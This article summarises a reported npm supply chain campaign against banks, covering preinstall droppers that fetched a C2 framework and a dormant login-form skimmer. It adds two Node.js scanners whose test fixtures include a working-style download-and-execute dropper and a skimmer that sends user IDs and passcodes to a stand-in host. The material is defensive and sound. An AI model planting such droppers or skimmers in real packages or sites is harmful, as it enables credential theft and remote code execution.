Application security vendor Checkmarx recently published a report describing what it says are the first known open-source software (OSS) supply chain attacks aimed at the banking industry. The attacks, identified by Checkmarx's supply chain research team, combine malicious npm packages with social engineering and the abuse of legitimate cloud infrastructure.
Several such attacks were discovered during the first half of 2023. Each involved attaching malicious functionality to specific components of the targeted banks' web assets. To appear legitimate, the attackers used fake LinkedIn profiles and set up custom command and control (C2) infrastructure.
Although Checkmarx reported the malicious open-source packages and had them removed, the company warns that attacks on the banking sector's software supply chain are a persistent trend.
In the first attack Checkmarx details, in early April, the threat actor uploaded packages to the npm registry whose preinstall scripts ran automatically as soon as the package was installed, so the payload executed before any of the package's own code was ever imported. The attacker also created a fake LinkedIn profile posing as an employee of the targeted bank to appear credible. Notably, the bank was unaware of the LinkedIn activity and had not commissioned any legitimate penetration testing that could explain it.
The attack proceeded in stages. The preinstall script first identified the victim's operating system, then decrypted the matching encrypted file bundled in the npm package and used it to download a second-stage payload. The Linux-specific encrypted file was not flagged as malicious by VirusTotal at the time, which helped the implant remain undetected on Linux systems.
The second stage was hosted on an Azure CDN subdomain that incorporated the targeted bank's name. Because the download came from legitimate Microsoft infrastructure, it slipped past traditional domain deny lists, and the bank's name in the hostname added credibility. The payload itself was the Havoc Framework, an open-source post-exploitation C2 framework built to evade standard defenses such as Windows Defender. The framework gives attackers the flexibility to adapt their tactics to whatever obstacles they meet in the victim's environment.
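As an added example (this is not code from the Checkmarx report or from npm), the following Node.js script triages a single package for the install-time behaviour described above. It lists the lifecycle hooks npm runs during installation, follows a `node <file>` hook to the script it executes, and checks that script for the stage-one indicators the report names: a platform check, decoding of an embedded blob, a network download, and writing and executing a file. The package manifests and script contents are constructed for the example, and the indicator patterns and verdict thresholds are this example's own heuristics, not anything the report specifies.

```javascript
// Added example, not code from the Checkmarx report or from npm: triage one package for the
// install-time dropper pattern described above. Package manifests, file contents, indicator
// regexes and verdict thresholds are all constructed for this example.

// Lifecycle scripts npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'preprepare', 'postprepare'];

// Stage-one behaviours from the report, as [label, pattern] pairs.
const INDICATORS = [
  ['platform-check',  /process\.platform|os\.platform\(\)|os\.type\(\)/],
  ['embedded-decode', /Buffer\.from\([^)]*['"](?:base64|hex)['"]\)|createDecipheriv|atob\(/],
  ['network-fetch',   /\bhttps?\.get\(|\bhttps?\.request\(|\bfetch\(|XMLHttpRequest|\baxios\b/],
  ['exec',            /child_process|\bexecSync\(|\bspawn\(|\bexecFile\(/],
  ['write-and-run',   /writeFileSync|chmodSync|\bfs\.chmod/],
];

// Returns the install-time hooks a manifest declares, with their commands.
function findLifecycleHooks(pkg) {
  const scripts = pkg.scripts || {};
  return INSTALL_HOOKS.filter(h => typeof scripts[h] === 'string')
                      .map(h => ({ hook: h, command: scripts[h] }));
}

// Returns the labels of every indicator present in a piece of source.
function scanSource(src) {
  return INDICATORS.filter(([, re]) => re.test(src)).map(([label]) => label);
}

// `files` maps paths inside the package to their contents, so `node ./x.js` hooks can be followed.
function auditPackage(pkg, files) {
  const findings = findLifecycleHooks(pkg).map(({ hook, command }) => {
    const m = command.match(/^\s*node\s+(\S+)/);
    const file = m ? m[1].replace(/^\.\//, '') : null;
    const src = file && file in files ? files[file] : command;   // fall back to the inline command
    return { hook, command, file, indicators: scanSource(src) };
  });
  const worst = Math.max(0, ...findings.map(f => f.indicators.length));
  // Hooks alone are common in legitimate native modules, so they only earn 'review'.
  const verdict = findings.length === 0 ? 'clean' : worst >= 3 ? 'high' : 'review';
  return { name: pkg.name, verdict, findings };
}

// Constructed manifests and files (the blob strings are placeholders, not real data).
const PLAIN_PKG   = { name: 'plain-utility-like', scripts: { test: 'tap test/*.js' } };
const NATIVE_PKG  = { name: 'native-addon-like', scripts: { install: 'node-gyp rebuild' } };
const SUSPECT_PKG = { name: 'bank-sdk-like', scripts: { preinstall: 'node ./scripts/setup.js' } };
const SUSPECT_FILES = {
  'scripts/setup.js': `
const fs = require('fs'), https = require('https');
const blob = process.platform === 'linux' ? '<linux blob>' : '<windows blob>';
const stageUrl = Buffer.from(blob, 'base64').toString();
https.get(stageUrl, res => { const out = fs.createWriteStream('/tmp/.cache'); res.pipe(out);
  out.on('finish', () => { fs.chmodSync('/tmp/.cache', 0o755); require('child_process').execFile('/tmp/.cache'); }); });
`,
};

for (const [pkg, files] of [[PLAIN_PKG, {}], [NATIVE_PKG, {}], [SUSPECT_PKG, SUSPECT_FILES]]) {
  const r = auditPackage(pkg, files);
  console.log(`${r.name}: ${r.verdict}`, r.findings.map(f => `${f.hook} -> ${f.indicators.join(',') || 'none'}`));
}
```

Run this over every package under node_modules before a dependency is admitted to a build. Legitimate native modules also declare install hooks (node-gyp rebuild is the usual case), so a hook by itself only earns 'review'; it is the combination of platform check, decode, download and execute in one script that earns 'high'. Setting ignore-scripts=true in .npmrc stops npm from running any of these hooks at all, at the cost of breaking packages that genuinely need them.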
A second, unrelated incident occurred in February at a different bank. Here the threat actors uploaded a package to the npm registry containing malicious code designed to blend into the victim bank's website and lie dormant until triggered. The code targeted a unique element ID in the HTML of the bank's login page, intercepting the data entered there and transmitting it to a remote location.
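As an added example (again not the report's code), here is a Node.js check for the dormant form-hijack pattern described in this incident. The premise is that a third-party package has no legitimate reason to hard-code the element IDs of the bank's own login page, so the scan is run per dependency rather than over the bank's own source: it collects every element ID the dependency looks up, intersects that with the login page's IDs, and reports whether the same code also hooks form events, waits for the element to appear, and has a network sink or a URL pointing at a host outside the first-party allowlist. The element IDs, hostnames and bundle snippets are constructed for the example, and the verdict rules are this example's own.

```javascript
// Added example, not code from the Checkmarx report: per-dependency scan for code that
// targets the bank's own login page element IDs and ships what it captures elsewhere.
// All element IDs, hostnames and bundle snippets below are constructed for the example.

const LOGIN_PAGE_IDS   = new Set(['login-form', 'user-id', 'passcode', 'otp-field']); // assumed
const FIRST_PARTY_HOSTS = new Set(['bank.example', 'api.bank.example']);              // assumed

// Element lookups by ID, via getElementById('x') or querySelector('#x').
const ID_LOOKUP = /getElementById\(\s*['"]([\w-]+)['"]\s*\)|querySelector(?:All)?\(\s*['"]#([\w-]+)['"]\s*\)/g;
// Hooks on the events a credential-capturing script would listen for.
const FORM_HOOK = /addEventListener\(\s*['"](?:submit|input|change|keyup|keydown|blur)['"]|\.on(?:submit|input|change|keyup)\s*=/;
// Waiting for the element to exist is how "dormant until triggered" usually looks in code.
const WAIT_FOR_ELEMENT = /setTimeout\(|setInterval\(|MutationObserver|DOMContentLoaded/;
// Ways to get data off the page.
const NETWORK_SINK = /\bfetch\(|XMLHttpRequest|sendBeacon\(|new\s+Image\(\)|WebSocket\(/;
const URL_HOST = /https?:\/\/([\w.-]+)/g;

function referencedIds(src) {
  const ids = new Set();
  for (const m of src.matchAll(ID_LOOKUP)) ids.add(m[1] ?? m[2]);
  return ids;
}

function externalHosts(src, firstParty) {
  const hosts = new Set();
  for (const m of src.matchAll(URL_HOST)) if (!firstParty.has(m[1])) hosts.add(m[1]);
  return [...hosts].sort();
}

// Scan one dependency's built source. `pageIds` are the IDs present on our own login page.
function scanDependency(name, src, pageIds = LOGIN_PAGE_IDS, firstParty = FIRST_PARTY_HOSTS) {
  const pageHits = [...referencedIds(src)].filter(id => pageIds.has(id)).sort();
  const hooksForm = FORM_HOOK.test(src);
  const waitsForElement = WAIT_FOR_ELEMENT.test(src);
  const hasSink = NETWORK_SINK.test(src);
  const hosts = externalHosts(src, firstParty);
  let verdict = 'clean';
  if (pageHits.length && hooksForm && hasSink) verdict = 'high';        // knows our IDs, listens, exfiltrates
  else if (pageHits.length && (hooksForm || hasSink)) verdict = 'review';
  return { name, verdict, pageHits, hooksForm, waitsForElement, hasSink, hosts };
}

// Constructed: a widget library that only touches its own mount point.
const BENIGN_SRC = `
export function mount(){const r=document.getElementById('app');
r.addEventListener('click',()=>r.classList.toggle('open'));}`;

// Constructed: a dependency that polls for the login form, hooks submit, and beacons the fields out.
const SUSPECT_SRC = `
(function g(){var f=document.getElementById('login-form');if(!f){return setTimeout(g,500)}
f.addEventListener('submit',function(){var d={u:document.getElementById('user-id').value,
p:document.querySelector('#passcode').value};navigator.sendBeacon('https://cdn-metrics.example/c',JSON.stringify(d))})})();`;

for (const r of [scanDependency('ui-widgets', BENIGN_SRC), scanDependency('analytics-helper', SUSPECT_SRC)]) {
  console.log(`${r.name}: ${r.verdict}`, r.pageHits, r.hosts);
}
```

Because the scan keys on IDs taken from the bank's own login page, it is specific to that application and has to be fed the real IDs from the deployed page; a generic skimmer signature would not know them. A Content-Security-Policy with a strict connect-src is the complementary runtime control: it blocks the beacon to a host outside the allowlist even when the static scan misses the code.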
Given how these threats have evolved, scanning for known vulnerabilities at build time is no longer sufficient: a deliberately malicious package contains no known vulnerability for such a scanner to find. To mitigate future attacks, organizations are advised to proactively secure every stage of the software development lifecycle, including which third-party packages are admitted and what they are allowed to do at install time.
Checkmarx's research team has been monitoring OSS attacks for some time. It previously alerted the industry to attacks on the PyPI repository and recently observed additional malicious campaigns on the npm registry, some of which caused sporadic denial of service.
Going forward, organizations must remain vigilant, evolve their defenses, and stay ahead of threat actors. Checkmarx's supply chain research team continues to track these attacks and will publish updates as they develop.